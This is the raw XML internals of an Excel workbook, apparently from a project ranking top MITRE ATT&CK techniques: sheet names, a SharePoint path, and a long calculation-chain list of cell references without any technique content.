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7"/>
  <workbookPr defaultThemeVersion="166925"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="https://mitreengenuity.sharepoint.com/sites/CTIDInternal/Shared Documents/Research &amp; Development/1 - Customer Projects/21-27 - Top ATT&amp;CK Techniques/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="8_{ABF0744F-11CA-4F88-9F13-0453472D321B}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="500" windowWidth="38400" windowHeight="22300" firstSheet="2" activeTab="2" xr2:uid="{9F06889A-6C7C-C544-8850-DA0B62593116}"/>
  </bookViews>
  <sheets>
    <sheet name="README" sheetId="6" r:id="rId1"/>
    <sheet name="TOP 10 TECHNIQUES" sheetId="4" r:id="rId2"/>
    <sheet name="Methodology" sheetId="1" r:id="rId3"/>
    <sheet name="Coverage Definitions" sheetId="2" r:id="rId4"/>
    <sheet name="techniques" sheetId="3" r:id="rId5"/>
    <sheet name="parameters" sheetId="5" r:id="rId6"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">techniques!$A$1:$T$567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S64" i="1" l="1"/>
  <c r="AT64" i="1" s="1"/>
  <c r="AS46" i="1"/>
  <c r="AT46" i="1" s="1"/>
  <c r="AS16" i="1"/>
  <c r="AT16" i="1" s="1"/>
  <c r="AS34" i="1"/>
  <c r="AT34" i="1" s="1"/>
  <c r="AS10" i="1"/>
  <c r="AT10" i="1" s="1"/>
  <c r="AS13" i="1"/>
  <c r="AT13" i="1" s="1"/>
  <c r="AS111" i="1"/>
  <c r="AT111" i="1" s="1"/>
  <c r="AS45" i="1"/>
  <c r="AT45" i="1" s="1"/>
  <c r="AS37" i="1"/>
  <c r="AT37" i="1" s="1"/>
  <c r="AS23" i="1"/>
  <c r="AT23" i="1" s="1"/>
  <c r="AS24" i="1"/>
  <c r="AT24" i="1" s="1"/>
  <c r="AS125" i="1"/>
  <c r="AT125" i="1" s="1"/>
  <c r="AS93" i="1"/>
  <c r="AT93" i="1" s="1"/>
  <c r="AS213" i="1"/>
  <c r="AT213" i="1" s="1"/>
  <c r="AS328" i="1"/>
  <c r="AT328" i="1" s="1"/>
  <c r="AS7" i="1"/>
  <c r="AT7" i="1" s="1"/>
  <c r="AS86" i="1"/>
  <c r="AT86" i="1" s="1"/>
  <c r="AS78" i="1"/>
  <c r="AT78" i="1" s="1"/>
  <c r="AS26" i="1"/>
  <c r="AT26" i="1" s="1"/>
  <c r="AS137" i="1"/>
  <c r="AT137" i="1" s="1"/>
  <c r="AS159" i="1"/>
  <c r="AT159" i="1" s="1"/>
  <c r="AS206" i="1"/>
  <c r="AT206" i="1" s="1"/>
  <c r="AS367" i="1"/>
  <c r="AT367" i="1" s="1"/>
  <c r="AS4" i="1"/>
  <c r="AT4" i="1" s="1"/>
  <c r="AS9" i="1"/>
  <c r="AT9" i="1" s="1"/>
  <c r="AS28" i="1"/>
  <c r="AT28" i="1" s="1"/>
  <c r="AS40" i="1"/>
  <c r="AT40" i="1" s="1"/>
  <c r="AS117" i="1"/>
  <c r="AT117" i="1" s="1"/>
  <c r="AS53" i="1"/>
  <c r="AT53" i="1" s="1"/>
  <c r="AS65" i="1"/>
  <c r="AT65" i="1" s="1"/>
  <c r="AS242" i="1"/>
  <c r="AT242" i="1" s="1"/>
  <c r="AS309" i="1"/>
  <c r="AT309" i="1" s="1"/>
  <c r="AS409" i="1"/>
  <c r="AT409" i="1" s="1"/>
  <c r="AS11" i="1"/>
  <c r="AT11" i="1" s="1"/>
  <c r="AS18" i="1"/>
  <c r="AT18" i="1" s="1"/>
  <c r="AS68" i="1"/>
  <c r="AT68" i="1" s="1"/>
  <c r="AS32" i="1"/>
  <c r="AT32" i="1" s="1"/>
  <c r="AS116" i="1"/>
  <c r="AT116" i="1" s="1"/>
  <c r="AS140" i="1"/>
  <c r="AT140" i="1" s="1"/>
  <c r="AS27" i="1"/>
  <c r="AT27" i="1" s="1"/>
  <c r="AS149" i="1"/>
  <c r="AT149" i="1" s="1"/>
  <c r="AS41" i="1"/>
  <c r="AT41" i="1" s="1"/>
  <c r="AS185" i="1"/>
  <c r="AT185" i="1" s="1"/>
  <c r="AS60" i="1"/>
  <c r="AT60" i="1" s="1"/>
  <c r="AS55" i="1"/>
  <c r="AT55" i="1" s="1"/>
  <c r="AS110" i="1"/>
  <c r="AT110" i="1" s="1"/>
  <c r="AS336" i="1"/>
  <c r="AT336" i="1" s="1"/>
  <c r="AS393" i="1"/>
  <c r="AT393" i="1" s="1"/>
  <c r="AS56" i="1"/>
  <c r="AT56" i="1" s="1"/>
  <c r="AS8" i="1"/>
  <c r="AT8" i="1" s="1"/>
  <c r="AS14" i="1"/>
  <c r="AT14" i="1" s="1"/>
  <c r="AS22" i="1"/>
  <c r="AT22" i="1" s="1"/>
  <c r="AS29" i="1"/>
  <c r="AT29" i="1" s="1"/>
  <c r="AS104" i="1"/>
  <c r="AT104" i="1" s="1"/>
  <c r="AS54" i="1"/>
  <c r="AT54" i="1" s="1"/>
  <c r="AS97" i="1"/>
  <c r="AT97" i="1" s="1"/>
  <c r="AS83" i="1"/>
  <c r="AT83" i="1" s="1"/>
  <c r="AS234" i="1"/>
  <c r="AT234" i="1" s="1"/>
  <c r="AS289" i="1"/>
  <c r="AT289" i="1" s="1"/>
  <c r="AS100" i="1"/>
  <c r="AT100" i="1" s="1"/>
  <c r="AS337" i="1"/>
  <c r="AT337" i="1" s="1"/>
  <c r="AS85" i="1"/>
  <c r="AT85" i="1" s="1"/>
  <c r="AS326" i="1"/>
  <c r="AT326" i="1" s="1"/>
  <c r="AS49" i="1"/>
  <c r="AT49" i="1" s="1"/>
  <c r="AS442" i="1"/>
  <c r="AT442" i="1" s="1"/>
  <c r="AS457" i="1"/>
  <c r="AT457" i="1" s="1"/>
  <c r="AS441" i="1"/>
  <c r="AT441" i="1" s="1"/>
  <c r="AS5" i="1"/>
  <c r="AT5" i="1" s="1"/>
  <c r="AS20" i="1"/>
  <c r="AT20" i="1" s="1"/>
  <c r="AS21" i="1"/>
  <c r="AT21" i="1" s="1"/>
  <c r="AS19" i="1"/>
  <c r="AT19" i="1" s="1"/>
  <c r="AS38" i="1"/>
  <c r="AT38" i="1" s="1"/>
  <c r="AS87" i="1"/>
  <c r="AT87" i="1" s="1"/>
  <c r="AS76" i="1"/>
  <c r="AT76" i="1" s="1"/>
  <c r="AS108" i="1"/>
  <c r="AT108" i="1" s="1"/>
  <c r="AS69" i="1"/>
  <c r="AT69" i="1" s="1"/>
  <c r="AS25" i="1"/>
  <c r="AT25" i="1" s="1"/>
  <c r="AS114" i="1"/>
  <c r="AT114" i="1" s="1"/>
  <c r="AS118" i="1"/>
  <c r="AT118" i="1" s="1"/>
  <c r="AS30" i="1"/>
  <c r="AT30" i="1" s="1"/>
  <c r="AS91" i="1"/>
  <c r="AT91" i="1" s="1"/>
  <c r="AS36" i="1"/>
  <c r="AT36" i="1" s="1"/>
  <c r="AS121" i="1"/>
  <c r="AT121" i="1" s="1"/>
  <c r="AS147" i="1"/>
  <c r="AT147" i="1" s="1"/>
  <c r="AS62" i="1"/>
  <c r="AT62" i="1" s="1"/>
  <c r="AS162" i="1"/>
  <c r="AT162" i="1" s="1"/>
  <c r="AS169" i="1"/>
  <c r="AT169" i="1" s="1"/>
  <c r="AS168" i="1"/>
  <c r="AT168" i="1" s="1"/>
  <c r="AS171" i="1"/>
  <c r="AT171" i="1" s="1"/>
  <c r="AS172" i="1"/>
  <c r="AT172" i="1" s="1"/>
  <c r="AS173" i="1"/>
  <c r="AT173" i="1" s="1"/>
  <c r="AS77" i="1"/>
  <c r="AT77" i="1" s="1"/>
  <c r="AS182" i="1"/>
  <c r="AT182" i="1" s="1"/>
  <c r="AS84" i="1"/>
  <c r="AT84" i="1" s="1"/>
  <c r="AS186" i="1"/>
  <c r="AT186" i="1" s="1"/>
  <c r="AS73" i="1"/>
  <c r="AT73" i="1" s="1"/>
  <c r="AS44" i="1"/>
  <c r="AT44" i="1" s="1"/>
  <c r="AS230" i="1"/>
  <c r="AT230" i="1" s="1"/>
  <c r="AS221" i="1"/>
  <c r="AT221" i="1" s="1"/>
  <c r="AS257" i="1"/>
  <c r="AT257" i="1" s="1"/>
  <c r="AS272" i="1"/>
  <c r="AT272" i="1" s="1"/>
  <c r="AS268" i="1"/>
  <c r="AT268" i="1" s="1"/>
  <c r="AS305" i="1"/>
  <c r="AT305" i="1" s="1"/>
  <c r="AS290" i="1"/>
  <c r="AT290" i="1" s="1"/>
  <c r="AS347" i="1"/>
  <c r="AT347" i="1" s="1"/>
  <c r="AS374" i="1"/>
  <c r="AT374" i="1" s="1"/>
  <c r="AS327" i="1"/>
  <c r="AT327" i="1" s="1"/>
  <c r="AS375" i="1"/>
  <c r="AT375" i="1" s="1"/>
  <c r="AS387" i="1"/>
  <c r="AT387" i="1" s="1"/>
  <c r="AS102" i="1"/>
  <c r="AT102" i="1" s="1"/>
  <c r="AS363" i="1"/>
  <c r="AT363" i="1" s="1"/>
  <c r="AS354" i="1"/>
  <c r="AT354" i="1" s="1"/>
  <c r="AS410" i="1"/>
  <c r="AT410" i="1" s="1"/>
  <c r="AS437" i="1"/>
  <c r="AT437" i="1" s="1"/>
  <c r="AS412" i="1"/>
  <c r="AT412" i="1" s="1"/>
  <c r="AS426" i="1"/>
  <c r="AT426" i="1" s="1"/>
  <c r="AS443" i="1"/>
  <c r="AT443" i="1" s="1"/>
  <c r="AS449" i="1"/>
  <c r="AT449" i="1" s="1"/>
  <c r="AS472" i="1"/>
  <c r="AT472" i="1" s="1"/>
  <c r="AS431" i="1"/>
  <c r="AT431" i="1" s="1"/>
  <c r="AS526" i="1"/>
  <c r="AT526" i="1" s="1"/>
  <c r="AS12" i="1"/>
  <c r="AT12" i="1" s="1"/>
  <c r="AS203" i="1"/>
  <c r="AT203" i="1" s="1"/>
  <c r="AS66" i="1"/>
  <c r="AT66" i="1" s="1"/>
  <c r="AS113" i="1"/>
  <c r="AT113" i="1" s="1"/>
  <c r="AS47" i="1"/>
  <c r="AT47" i="1" s="1"/>
  <c r="AS101" i="1"/>
  <c r="AT101" i="1" s="1"/>
  <c r="AS42" i="1"/>
  <c r="AT42" i="1" s="1"/>
  <c r="AS88" i="1"/>
  <c r="AT88" i="1" s="1"/>
  <c r="AS70" i="1"/>
  <c r="AT70" i="1" s="1"/>
  <c r="AS119" i="1"/>
  <c r="AT119" i="1" s="1"/>
  <c r="AS134" i="1"/>
  <c r="AT134" i="1" s="1"/>
  <c r="AS124" i="1"/>
  <c r="AT124" i="1" s="1"/>
  <c r="AS126" i="1"/>
  <c r="AT126" i="1" s="1"/>
  <c r="AS141" i="1"/>
  <c r="AT141" i="1" s="1"/>
  <c r="AS35" i="1"/>
  <c r="AT35" i="1" s="1"/>
  <c r="AS132" i="1"/>
  <c r="AT132" i="1" s="1"/>
  <c r="AS133" i="1"/>
  <c r="AT133" i="1" s="1"/>
  <c r="AS138" i="1"/>
  <c r="AT138" i="1" s="1"/>
  <c r="AS142" i="1"/>
  <c r="AT142" i="1" s="1"/>
  <c r="AS105" i="1"/>
  <c r="AT105" i="1" s="1"/>
  <c r="AS150" i="1"/>
  <c r="AT150" i="1" s="1"/>
  <c r="AS155" i="1"/>
  <c r="AT155" i="1" s="1"/>
  <c r="AS156" i="1"/>
  <c r="AT156" i="1" s="1"/>
  <c r="AS157" i="1"/>
  <c r="AT157" i="1" s="1"/>
  <c r="AS176" i="1"/>
  <c r="AT176" i="1" s="1"/>
  <c r="AS94" i="1"/>
  <c r="AT94" i="1" s="1"/>
  <c r="AS226" i="1"/>
  <c r="AT226" i="1" s="1"/>
  <c r="AS178" i="1"/>
  <c r="AT178" i="1" s="1"/>
  <c r="AS181" i="1"/>
  <c r="AT181" i="1" s="1"/>
  <c r="AS50" i="1"/>
  <c r="AT50" i="1" s="1"/>
  <c r="AS207" i="1"/>
  <c r="AT207" i="1" s="1"/>
  <c r="AS214" i="1"/>
  <c r="AT214" i="1" s="1"/>
  <c r="AS209" i="1"/>
  <c r="AT209" i="1" s="1"/>
  <c r="AS71" i="1"/>
  <c r="AT71" i="1" s="1"/>
  <c r="AS212" i="1"/>
  <c r="AT212" i="1" s="1"/>
  <c r="AS215" i="1"/>
  <c r="AT215" i="1" s="1"/>
  <c r="AS222" i="1"/>
  <c r="AT222" i="1" s="1"/>
  <c r="AS271" i="1"/>
  <c r="AT271" i="1" s="1"/>
  <c r="AS231" i="1"/>
  <c r="AT231" i="1" s="1"/>
  <c r="AS280" i="1"/>
  <c r="AT280" i="1" s="1"/>
  <c r="AS285" i="1"/>
  <c r="AT285" i="1" s="1"/>
  <c r="AS471" i="1"/>
  <c r="AT471" i="1" s="1"/>
  <c r="AS249" i="1"/>
  <c r="AT249" i="1" s="1"/>
  <c r="AS335" i="1"/>
  <c r="AT335" i="1" s="1"/>
  <c r="AS248" i="1"/>
  <c r="AT248" i="1" s="1"/>
  <c r="AS258" i="1"/>
  <c r="AT258" i="1" s="1"/>
  <c r="AS260" i="1"/>
  <c r="AT260" i="1" s="1"/>
  <c r="AS261" i="1"/>
  <c r="AT261" i="1" s="1"/>
  <c r="AS291" i="1"/>
  <c r="AT291" i="1" s="1"/>
  <c r="AS286" i="1"/>
  <c r="AT286" i="1" s="1"/>
  <c r="AS270" i="1"/>
  <c r="AT270" i="1" s="1"/>
  <c r="AS276" i="1"/>
  <c r="AT276" i="1" s="1"/>
  <c r="AS294" i="1"/>
  <c r="AT294" i="1" s="1"/>
  <c r="AS293" i="1"/>
  <c r="AT293" i="1" s="1"/>
  <c r="AS300" i="1"/>
  <c r="AT300" i="1" s="1"/>
  <c r="AS299" i="1"/>
  <c r="AT299" i="1" s="1"/>
  <c r="AS310" i="1"/>
  <c r="AT310" i="1" s="1"/>
  <c r="AS311" i="1"/>
  <c r="AT311" i="1" s="1"/>
  <c r="AS312" i="1"/>
  <c r="AT312" i="1" s="1"/>
  <c r="AS59" i="1"/>
  <c r="AT59" i="1" s="1"/>
  <c r="AS376" i="1"/>
  <c r="AT376" i="1" s="1"/>
  <c r="AS343" i="1"/>
  <c r="AT343" i="1" s="1"/>
  <c r="AS358" i="1"/>
  <c r="AT358" i="1" s="1"/>
  <c r="AS355" i="1"/>
  <c r="AT355" i="1" s="1"/>
  <c r="AS357" i="1"/>
  <c r="AT357" i="1" s="1"/>
  <c r="AS378" i="1"/>
  <c r="AT378" i="1" s="1"/>
  <c r="AS368" i="1"/>
  <c r="AT368" i="1" s="1"/>
  <c r="AS369" i="1"/>
  <c r="AT369" i="1" s="1"/>
  <c r="AS61" i="1"/>
  <c r="AT61" i="1" s="1"/>
  <c r="AS377" i="1"/>
  <c r="AT377" i="1" s="1"/>
  <c r="AS386" i="1"/>
  <c r="AT386" i="1" s="1"/>
  <c r="AS394" i="1"/>
  <c r="AT394" i="1" s="1"/>
  <c r="AS406" i="1"/>
  <c r="AT406" i="1" s="1"/>
  <c r="AS413" i="1"/>
  <c r="AT413" i="1" s="1"/>
  <c r="AS106" i="1"/>
  <c r="AT106" i="1" s="1"/>
  <c r="AS419" i="1"/>
  <c r="AT419" i="1" s="1"/>
  <c r="AS420" i="1"/>
  <c r="AT420" i="1" s="1"/>
  <c r="AS414" i="1"/>
  <c r="AT414" i="1" s="1"/>
  <c r="AS418" i="1"/>
  <c r="AT418" i="1" s="1"/>
  <c r="AS428" i="1"/>
  <c r="AT428" i="1" s="1"/>
  <c r="AS429" i="1"/>
  <c r="AT429" i="1" s="1"/>
  <c r="AS82" i="1"/>
  <c r="AT82" i="1" s="1"/>
  <c r="AS438" i="1"/>
  <c r="AT438" i="1" s="1"/>
  <c r="AS450" i="1"/>
  <c r="AT450" i="1" s="1"/>
  <c r="AS473" i="1"/>
  <c r="AT473" i="1" s="1"/>
  <c r="AS459" i="1"/>
  <c r="AT459" i="1" s="1"/>
  <c r="AS458" i="1"/>
  <c r="AT458" i="1" s="1"/>
  <c r="AS474" i="1"/>
  <c r="AT474" i="1" s="1"/>
  <c r="AS475" i="1"/>
  <c r="AT475" i="1" s="1"/>
  <c r="AS476" i="1"/>
  <c r="AT476" i="1" s="1"/>
  <c r="AS477" i="1"/>
  <c r="AT477" i="1" s="1"/>
  <c r="AS478" i="1"/>
  <c r="AT478" i="1" s="1"/>
  <c r="AS422" i="1"/>
  <c r="AT422" i="1" s="1"/>
  <c r="AS447" i="1"/>
  <c r="AT447" i="1" s="1"/>
  <c r="AS454" i="1"/>
  <c r="AT454" i="1" s="1"/>
  <c r="AS81" i="1"/>
  <c r="AT81" i="1" s="1"/>
  <c r="AS465" i="1"/>
  <c r="AT465" i="1" s="1"/>
  <c r="AS466" i="1"/>
  <c r="AT466" i="1" s="1"/>
  <c r="AS467" i="1"/>
  <c r="AT467" i="1" s="1"/>
  <c r="AS528" i="1"/>
  <c r="AT528" i="1" s="1"/>
  <c r="AS529" i="1"/>
  <c r="AT529" i="1" s="1"/>
  <c r="AS530" i="1"/>
  <c r="AT530" i="1" s="1"/>
  <c r="AS531" i="1"/>
  <c r="AT531" i="1" s="1"/>
  <c r="AS532" i="1"/>
  <c r="AT532" i="1" s="1"/>
  <c r="AS533" i="1"/>
  <c r="AT533" i="1" s="1"/>
  <c r="AS527" i="1"/>
  <c r="AT527" i="1" s="1"/>
  <c r="AS534" i="1"/>
  <c r="AT534" i="1" s="1"/>
  <c r="AS535" i="1"/>
  <c r="AT535" i="1" s="1"/>
  <c r="AS479" i="1"/>
  <c r="AT479" i="1" s="1"/>
  <c r="AS461" i="1"/>
  <c r="AT461" i="1" s="1"/>
  <c r="AS6" i="1"/>
  <c r="AT6" i="1" s="1"/>
  <c r="AS15" i="1"/>
  <c r="AT15" i="1" s="1"/>
  <c r="AS112" i="1"/>
  <c r="AT112" i="1" s="1"/>
  <c r="AS17" i="1"/>
  <c r="AT17" i="1" s="1"/>
  <c r="AS89" i="1"/>
  <c r="AT89" i="1" s="1"/>
  <c r="AS115" i="1"/>
  <c r="AT115" i="1" s="1"/>
  <c r="AS39" i="1"/>
  <c r="AT39" i="1" s="1"/>
  <c r="AS75" i="1"/>
  <c r="AT75" i="1" s="1"/>
  <c r="AS154" i="1"/>
  <c r="AT154" i="1" s="1"/>
  <c r="AS63" i="1"/>
  <c r="AT63" i="1" s="1"/>
  <c r="AS127" i="1"/>
  <c r="AT127" i="1" s="1"/>
  <c r="AS33" i="1"/>
  <c r="AT33" i="1" s="1"/>
  <c r="AS120" i="1"/>
  <c r="AT120" i="1" s="1"/>
  <c r="AS31" i="1"/>
  <c r="AT31" i="1" s="1"/>
  <c r="AS51" i="1"/>
  <c r="AT51" i="1" s="1"/>
  <c r="AS131" i="1"/>
  <c r="AT131" i="1" s="1"/>
  <c r="AS96" i="1"/>
  <c r="AT96" i="1" s="1"/>
  <c r="AS167" i="1"/>
  <c r="AT167" i="1" s="1"/>
  <c r="AS122" i="1"/>
  <c r="AT122" i="1" s="1"/>
  <c r="AS123" i="1"/>
  <c r="AT123" i="1" s="1"/>
  <c r="AS135" i="1"/>
  <c r="AT135" i="1" s="1"/>
  <c r="AS128" i="1"/>
  <c r="AT128" i="1" s="1"/>
  <c r="AS160" i="1"/>
  <c r="AT160" i="1" s="1"/>
  <c r="AS143" i="1"/>
  <c r="AT143" i="1" s="1"/>
  <c r="AS129" i="1"/>
  <c r="AT129" i="1" s="1"/>
  <c r="AS43" i="1"/>
  <c r="AT43" i="1" s="1"/>
  <c r="AS136" i="1"/>
  <c r="AT136" i="1" s="1"/>
  <c r="AS148" i="1"/>
  <c r="AT148" i="1" s="1"/>
  <c r="AS144" i="1"/>
  <c r="AT144" i="1" s="1"/>
  <c r="AS139" i="1"/>
  <c r="AT139" i="1" s="1"/>
  <c r="AS161" i="1"/>
  <c r="AT161" i="1" s="1"/>
  <c r="AS151" i="1"/>
  <c r="AT151" i="1" s="1"/>
  <c r="AS165" i="1"/>
  <c r="AT165" i="1" s="1"/>
  <c r="AS256" i="1"/>
  <c r="AT256" i="1" s="1"/>
  <c r="AS130" i="1"/>
  <c r="AT130" i="1" s="1"/>
  <c r="AS67" i="1"/>
  <c r="AT67" i="1" s="1"/>
  <c r="AS152" i="1"/>
  <c r="AT152" i="1" s="1"/>
  <c r="AS153" i="1"/>
  <c r="AT153" i="1" s="1"/>
  <c r="AS184" i="1"/>
  <c r="AT184" i="1" s="1"/>
  <c r="AS174" i="1"/>
  <c r="AT174" i="1" s="1"/>
  <c r="AS158" i="1"/>
  <c r="AT158" i="1" s="1"/>
  <c r="AS191" i="1"/>
  <c r="AT191" i="1" s="1"/>
  <c r="AS95" i="1"/>
  <c r="AT95" i="1" s="1"/>
  <c r="AS145" i="1"/>
  <c r="AT145" i="1" s="1"/>
  <c r="AS146" i="1"/>
  <c r="AT146" i="1" s="1"/>
  <c r="AS107" i="1"/>
  <c r="AT107" i="1" s="1"/>
  <c r="AS163" i="1"/>
  <c r="AT163" i="1" s="1"/>
  <c r="AS48" i="1"/>
  <c r="AT48" i="1" s="1"/>
  <c r="AS170" i="1"/>
  <c r="AT170" i="1" s="1"/>
  <c r="AS175" i="1"/>
  <c r="AT175" i="1" s="1"/>
  <c r="AS183" i="1"/>
  <c r="AT183" i="1" s="1"/>
  <c r="AS58" i="1"/>
  <c r="AT58" i="1" s="1"/>
  <c r="AS177" i="1"/>
  <c r="AT177" i="1" s="1"/>
  <c r="AS179" i="1"/>
  <c r="AT179" i="1" s="1"/>
  <c r="AS180" i="1"/>
  <c r="AT180" i="1" s="1"/>
  <c r="AS232" i="1"/>
  <c r="AT232" i="1" s="1"/>
  <c r="AS164" i="1"/>
  <c r="AT164" i="1" s="1"/>
  <c r="AS233" i="1"/>
  <c r="AT233" i="1" s="1"/>
  <c r="AS166" i="1"/>
  <c r="AT166" i="1" s="1"/>
  <c r="AS187" i="1"/>
  <c r="AT187" i="1" s="1"/>
  <c r="AS188" i="1"/>
  <c r="AT188" i="1" s="1"/>
  <c r="AS189" i="1"/>
  <c r="AT189" i="1" s="1"/>
  <c r="AS190" i="1"/>
  <c r="AT190" i="1" s="1"/>
  <c r="AS194" i="1"/>
  <c r="AT194" i="1" s="1"/>
  <c r="AS192" i="1"/>
  <c r="AT192" i="1" s="1"/>
  <c r="AS193" i="1"/>
  <c r="AT193" i="1" s="1"/>
  <c r="AS195" i="1"/>
  <c r="AT195" i="1" s="1"/>
  <c r="AS366" i="1"/>
  <c r="AT366" i="1" s="1"/>
  <c r="AS197" i="1"/>
  <c r="AT197" i="1" s="1"/>
  <c r="AS198" i="1"/>
  <c r="AT198" i="1" s="1"/>
  <c r="AS199" i="1"/>
  <c r="AT199" i="1" s="1"/>
  <c r="AS204" i="1"/>
  <c r="AT204" i="1" s="1"/>
  <c r="AS200" i="1"/>
  <c r="AT200" i="1" s="1"/>
  <c r="AS201" i="1"/>
  <c r="AT201" i="1" s="1"/>
  <c r="AS196" i="1"/>
  <c r="AT196" i="1" s="1"/>
  <c r="AS202" i="1"/>
  <c r="AT202" i="1" s="1"/>
  <c r="AS79" i="1"/>
  <c r="AT79" i="1" s="1"/>
  <c r="AS205" i="1"/>
  <c r="AT205" i="1" s="1"/>
  <c r="AS262" i="1"/>
  <c r="AT262" i="1" s="1"/>
  <c r="AS208" i="1"/>
  <c r="AT208" i="1" s="1"/>
  <c r="AS210" i="1"/>
  <c r="AT210" i="1" s="1"/>
  <c r="AS269" i="1"/>
  <c r="AT269" i="1" s="1"/>
  <c r="AS235" i="1"/>
  <c r="AT235" i="1" s="1"/>
  <c r="AS236" i="1"/>
  <c r="AT236" i="1" s="1"/>
  <c r="AS284" i="1"/>
  <c r="AT284" i="1" s="1"/>
  <c r="AS237" i="1"/>
  <c r="AT237" i="1" s="1"/>
  <c r="AS98" i="1"/>
  <c r="AT98" i="1" s="1"/>
  <c r="AS216" i="1"/>
  <c r="AT216" i="1" s="1"/>
  <c r="AS240" i="1"/>
  <c r="AT240" i="1" s="1"/>
  <c r="AS217" i="1"/>
  <c r="AT217" i="1" s="1"/>
  <c r="AS219" i="1"/>
  <c r="AT219" i="1" s="1"/>
  <c r="AS218" i="1"/>
  <c r="AT218" i="1" s="1"/>
  <c r="AS220" i="1"/>
  <c r="AT220" i="1" s="1"/>
  <c r="AS225" i="1"/>
  <c r="AT225" i="1" s="1"/>
  <c r="AS224" i="1"/>
  <c r="AT224" i="1" s="1"/>
  <c r="AS223" i="1"/>
  <c r="AT223" i="1" s="1"/>
  <c r="AS243" i="1"/>
  <c r="AT243" i="1" s="1"/>
  <c r="AS227" i="1"/>
  <c r="AT227" i="1" s="1"/>
  <c r="AS228" i="1"/>
  <c r="AT228" i="1" s="1"/>
  <c r="AS229" i="1"/>
  <c r="AT229" i="1" s="1"/>
  <c r="AS283" i="1"/>
  <c r="AT283" i="1" s="1"/>
  <c r="AS246" i="1"/>
  <c r="AT246" i="1" s="1"/>
  <c r="AS80" i="1"/>
  <c r="AT80" i="1" s="1"/>
  <c r="AS292" i="1"/>
  <c r="AT292" i="1" s="1"/>
  <c r="AS238" i="1"/>
  <c r="AT238" i="1" s="1"/>
  <c r="AS239" i="1"/>
  <c r="AT239" i="1" s="1"/>
  <c r="AS109" i="1"/>
  <c r="AT109" i="1" s="1"/>
  <c r="AS259" i="1"/>
  <c r="AT259" i="1" s="1"/>
  <c r="AS241" i="1"/>
  <c r="AT241" i="1" s="1"/>
  <c r="AS263" i="1"/>
  <c r="AT263" i="1" s="1"/>
  <c r="AS264" i="1"/>
  <c r="AT264" i="1" s="1"/>
  <c r="AS244" i="1"/>
  <c r="AT244" i="1" s="1"/>
  <c r="AS247" i="1"/>
  <c r="AT247" i="1" s="1"/>
  <c r="AS245" i="1"/>
  <c r="AT245" i="1" s="1"/>
  <c r="AS255" i="1"/>
  <c r="AT255" i="1" s="1"/>
  <c r="AS250" i="1"/>
  <c r="AT250" i="1" s="1"/>
  <c r="AS251" i="1"/>
  <c r="AT251" i="1" s="1"/>
  <c r="AS252" i="1"/>
  <c r="AT252" i="1" s="1"/>
  <c r="AS253" i="1"/>
  <c r="AT253" i="1" s="1"/>
  <c r="AS254" i="1"/>
  <c r="AT254" i="1" s="1"/>
  <c r="AS313" i="1"/>
  <c r="AT313" i="1" s="1"/>
  <c r="AS277" i="1"/>
  <c r="AT277" i="1" s="1"/>
  <c r="AS211" i="1"/>
  <c r="AT211" i="1" s="1"/>
  <c r="AS265" i="1"/>
  <c r="AT265" i="1" s="1"/>
  <c r="AS267" i="1"/>
  <c r="AT267" i="1" s="1"/>
  <c r="AS266" i="1"/>
  <c r="AT266" i="1" s="1"/>
  <c r="AS288" i="1"/>
  <c r="AT288" i="1" s="1"/>
  <c r="AS74" i="1"/>
  <c r="AT74" i="1" s="1"/>
  <c r="AS275" i="1"/>
  <c r="AT275" i="1" s="1"/>
  <c r="AS273" i="1"/>
  <c r="AT273" i="1" s="1"/>
  <c r="AS274" i="1"/>
  <c r="AT274" i="1" s="1"/>
  <c r="AS302" i="1"/>
  <c r="AT302" i="1" s="1"/>
  <c r="AS278" i="1"/>
  <c r="AT278" i="1" s="1"/>
  <c r="AS279" i="1"/>
  <c r="AT279" i="1" s="1"/>
  <c r="AS281" i="1"/>
  <c r="AT281" i="1" s="1"/>
  <c r="AS282" i="1"/>
  <c r="AT282" i="1" s="1"/>
  <c r="AS306" i="1"/>
  <c r="AT306" i="1" s="1"/>
  <c r="AS287" i="1"/>
  <c r="AT287" i="1" s="1"/>
  <c r="AS296" i="1"/>
  <c r="AT296" i="1" s="1"/>
  <c r="AS308" i="1"/>
  <c r="AT308" i="1" s="1"/>
  <c r="AS314" i="1"/>
  <c r="AT314" i="1" s="1"/>
  <c r="AS315" i="1"/>
  <c r="AT315" i="1" s="1"/>
  <c r="AS322" i="1"/>
  <c r="AT322" i="1" s="1"/>
  <c r="AS295" i="1"/>
  <c r="AT295" i="1" s="1"/>
  <c r="AS72" i="1"/>
  <c r="AT72" i="1" s="1"/>
  <c r="AS304" i="1"/>
  <c r="AT304" i="1" s="1"/>
  <c r="AS303" i="1"/>
  <c r="AT303" i="1" s="1"/>
  <c r="AS330" i="1"/>
  <c r="AT330" i="1" s="1"/>
  <c r="AS301" i="1"/>
  <c r="AT301" i="1" s="1"/>
  <c r="AS340" i="1"/>
  <c r="AT340" i="1" s="1"/>
  <c r="AS316" i="1"/>
  <c r="AT316" i="1" s="1"/>
  <c r="AS323" i="1"/>
  <c r="AT323" i="1" s="1"/>
  <c r="AS324" i="1"/>
  <c r="AT324" i="1" s="1"/>
  <c r="AS317" i="1"/>
  <c r="AT317" i="1" s="1"/>
  <c r="AS318" i="1"/>
  <c r="AT318" i="1" s="1"/>
  <c r="AS319" i="1"/>
  <c r="AT319" i="1" s="1"/>
  <c r="AS325" i="1"/>
  <c r="AT325" i="1" s="1"/>
  <c r="AS320" i="1"/>
  <c r="AT320" i="1" s="1"/>
  <c r="AS321" i="1"/>
  <c r="AT321" i="1" s="1"/>
  <c r="AS329" i="1"/>
  <c r="AT329" i="1" s="1"/>
  <c r="AS331" i="1"/>
  <c r="AT331" i="1" s="1"/>
  <c r="AS332" i="1"/>
  <c r="AT332" i="1" s="1"/>
  <c r="AS348" i="1"/>
  <c r="AT348" i="1" s="1"/>
  <c r="AS52" i="1"/>
  <c r="AT52" i="1" s="1"/>
  <c r="AS338" i="1"/>
  <c r="AT338" i="1" s="1"/>
